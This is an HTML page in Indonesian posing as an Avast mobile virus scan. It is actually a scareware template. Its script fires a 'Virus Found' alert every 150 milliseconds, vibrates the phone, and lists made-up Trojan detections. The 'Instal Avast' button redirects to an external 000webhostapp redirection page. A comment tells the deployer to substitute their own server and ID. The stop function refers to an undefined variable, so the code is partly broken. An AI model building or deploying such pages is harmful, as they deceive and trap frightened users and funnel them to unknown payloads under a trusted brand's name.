<html>
	<head>
		<title>Avast Security check</title>
		<meta name="viewport" content="width=device-width, initial-scale=1.0" />
		<style>
			#wrap{
				position: absolute;
				left: 15px;
				top: 15px;
				background: #fafafa;
				box-shadow: 0px 0px 3px #999;
				}
			#wrap-title{
				height: 75px;
				width: 100%;
				overflow: hidden;
				border-bottom: 2px solid #eaeaea;
				}
			#wrap-title-logo{
				width: 75px;
				height: 75px;
				display: inline-block;
				background-image: url('./pic_antivirus.png');
				background-size: 60px;
				background-position: 10px;
				background-repeat: no-repeat;
				}
			#wrap-title-title{
				position: absolute;
				top: 0px;
				left: 0px;
				margin-left: 75px;
				height: 75px;
				}
			#wrap-content{
				left: 0px;
				top: 75px;
				width: 100%;
				overflow: hidden;
				}
			#wrap-bottom{
				width: 100%;
				height: 50px;
				position: absolute;
				bottom: 0px;
				left: 0px;
				border-top: 3px solid #eaeaea;
				background-color: #fafafa;
				}
			.list{
				width: 100%;
				height: 40px;
				border-bottom: 1px solid #eaeaea;
				}
				.list-img{
					width: 40px;
					height: 40px;
					background-image: url('./warning.png');
					background-repeat: no-repeat;
					background-size: 30px 30px;
					background-position: 5px 0px;
					display: inline-block;
					}
				.list-virus{
					display: inline-block;
					height: 38px;
					width: 70%;
					margin: 6px 2px 2px 0px;
					font-size: 13px;
					overflow: hidden;
					text-overflow: ellipsis;
					white-space: nowrap;
					}
				#wrap-bottom-ask{
					height: 50px;
					}
				#wrap-bottom-link{
					display: inline-block;
					padding: 15px;
					position: absolute;
					top: 0px;
					right: 0px;
					font-weight: bold;
					font-size: 15px;
					white-space: nowrap;
					}
		</style>
	</head>
	<body style="background-color: #eaeaea; font-family: arial, verdana">
		<div id="wrap">
			<div id="wrap-title">
				<div id="wrap-title-logo">
				</div>
				<div id="wrap-title-title">
					<h1 style="font-size: 18px; margin: 5px;">Memindai virus<span id="dot">.</span></h1>
					<p style="font-size: 13px; margin: 5px">Diperiksa oleh Avast Mobile <br />Anti Virus</p>
				</div>
			</div>
			<div id="wrap-content">
			</div>
			<div id="wrap-bottom">
				<div id="wrap-bottom-ask">
					<h2 style="white-space: nowrap; font-size: 15px; margin: 15px 10px">Perbaiki ini?</h2>
				</div>
				<a href="#" onclick="stopSI()" id="wrap-bottom-link">Instal Avast</a>
			</div>
		</div>
		<script>
			var wrap = document.getElementById("wrap");
			var wrap_con = document.getElementById("wrap-content");
			var dot = document.getElementById("dot");
			wrap.style.width = window.innerWidth-30+"px";
			wrap.style.height = window.innerHeight-30+"px";
			wrap_con.style.height = window.innerHeight-155+"px";
			var v = 0;
			localStorage.removeItem("virus");
			setInterval(function (){
				if(dot.innerHTML == "..."){
					dot.innerHTML = "";
					}
				else{
					dot.innerHTML += ".";
					}
				}, 300);
			if(localStorage.virus != undefined){
				wrap_con.innerHTML = localStorage.virus;
				}
			setInterval(function (){
				alert("! Virus Found");
				navigator.vibrate(500); 
				var str = wrap_con.innerHTML; 
				var str2 = '<div class="list"><div class="list-img"></div><div class="list-virus">Found Virus ! Trojan '+Math.floor(Math.random()*10)+"."+Math.floor(Math.random()*10)+"."+Math.floor(Math.random()*10)+' <br />(file://data/data/hacker'+Math.floor(Math.random()*10)+""+Math.floor(Math.random()*10)+""+Math.floor(Math.random()*10)+'.arm.main/private/trojan v'+Math.floor(Math.random()*10)+"."+Math.floor(Math.random()*10)+"."+Math.floor(Math.random()*10)+'.trojan)</div></div>'; 
				localStorage.virus = str2+str; 
				wrap_con.innerHTML = str2+str; 
				location.assign("#trojan virus v"+Math.floor(Math.random()*10)+"."+Math.floor(Math.random()*10)+"."+Math.floor(Math.random()*10));
				}, 150);
			function stopSI(){
				clearInterval(si);
				setTimeout(function (){
						
						
					// GANTI ke redirection.php SERVER dan GANTI ID
					location.assign("http://scr-cdn.000webhostapp.com/redirection.php?id=4");
					}, 150);
				}
		</script>
	</body>
</html>